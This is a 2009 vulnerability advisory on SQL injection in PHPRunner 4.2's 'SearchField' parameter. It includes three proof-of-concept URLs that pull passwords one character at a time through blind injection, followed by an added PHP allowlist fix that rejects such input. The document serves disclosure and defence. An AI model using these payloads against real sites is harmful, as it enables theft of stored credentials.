PHPRunner SQL Injection
Date: Tue, 17 Mar 2009 14:05:37 +0330
From: [email protected]
To: [email protected]
Subject: PHPRunner SQL Injection

##########################www.BugReport.ir########################################
#
#        AmnPardaz Security Research Team
#
# Title:                PHPRunner SQL Injection
# Vendor:               http://www.xlinesoft.com
# Vulnerable Version:   4.2 (prior versions also may be affected)
# Exploitation:         Remote with browser
# Original Advisory:    http://www.bugreport.ir/index_63.htm
# Fix:                  N/A
###################################################################################

####################
- Description:
####################

PHPRunner builds a visually appealing web interface for popular
databases. Your web site visitors will be able to easily search, add,
edit, delete and export data in MySQL, Oracle, SQL Server, MS Access,
and Postgre databases.

####################
- Vulnerability:
####################

Input passed to the "SearchField" parameter in "UserView_list.php" is
not properly sanitised before being used in SQL queries.
This can be exploited to manipulate SQL queries by injecting arbitrary
SQL code.

Vulnerable Pages: 'orders_list.php', 'users_list.php',
'Administrator_list.php'


####################
- PoC:
####################

It's possible to obtain plain-text passwords from the database with a blind
fishing exploit:

http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=Password like '%%')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,1)='a')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,2)='ab')--

####################
- Solution:
####################

Edit the source code to ensure that inputs are properly sanitized.


####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com
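
For a parameter such as SearchField, which names a column, the sanitisation asked for in the Solution section means an allowlist lookup, because identifiers cannot be bound as query parameters; the search term itself is bound. The following is an added example, not part of the advisory or of PHPRunner's generated code; the function buildSearch, the table name UserView and the columns UserName/Email are assumptions.

```php
<?php
// Added example: hypothetical search handler, not PHPRunner's generated code.
// Table "UserView" and columns UserName/Email are assumed for illustration.
const COLUMNS  = ['UserName' => 'UserName', 'Email' => 'Email'];
const PATTERNS = ['Contains' => '%%%s%%', 'Equals' => '%s'];

function buildSearch(array $q): array
{
    $field  = $q['SearchField']  ?? '';
    $option = $q['SearchOption'] ?? 'Contains';
    $term   = $q['SearchFor']    ?? '';
    // Reject array-valued parameters (e.g. SearchField[]=x) up front.
    if (!is_string($field) || !is_string($option) || !is_string($term)) {
        throw new InvalidArgumentException('parameters must be strings');
    }
    // Identifiers cannot be bound as parameters, so the column is looked up
    // in a fixed map; the request value is only ever used as the map key.
    if (!array_key_exists($field, COLUMNS)) {
        throw new InvalidArgumentException('unknown SearchField');
    }
    if (!array_key_exists($option, PATTERNS)) {
        throw new InvalidArgumentException('unknown SearchOption');
    }
    // Escape LIKE wildcards in the search term, then bind it as a parameter.
    $escaped = strtr($term, ['!' => '!!', '%' => '!%', '_' => '!_']);
    $sql = 'SELECT UserName, Email FROM UserView WHERE '
         . COLUMNS[$field] . " LIKE ? ESCAPE '!'";
    return [$sql, [sprintf(PATTERNS[$option], $escaped)]];
}

// Constructed requests: one normal search, and one whose SearchField has
// the shape shown in the PoC section.
$requests = [
    ['SearchField' => 'UserName', 'SearchOption' => 'Contains', 'SearchFor' => 'abc'],
    ['SearchField' => "mid(Password,1,1)='a')--", 'SearchOption' => 'Contains', 'SearchFor' => 'abc'],
];
foreach ($requests as $q) {
    try {
        [$sql, $params] = buildSearch($q);
        echo "OK   $sql  params=", json_encode($params), "\n";
    } catch (InvalidArgumentException $e) {
        echo "DENY ", $e->getMessage(), ": ", json_encode($q['SearchField']), "\n";
    }
}
```

The Password column is deliberately absent from the map, so it cannot be selected as a search field even by its plain name.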


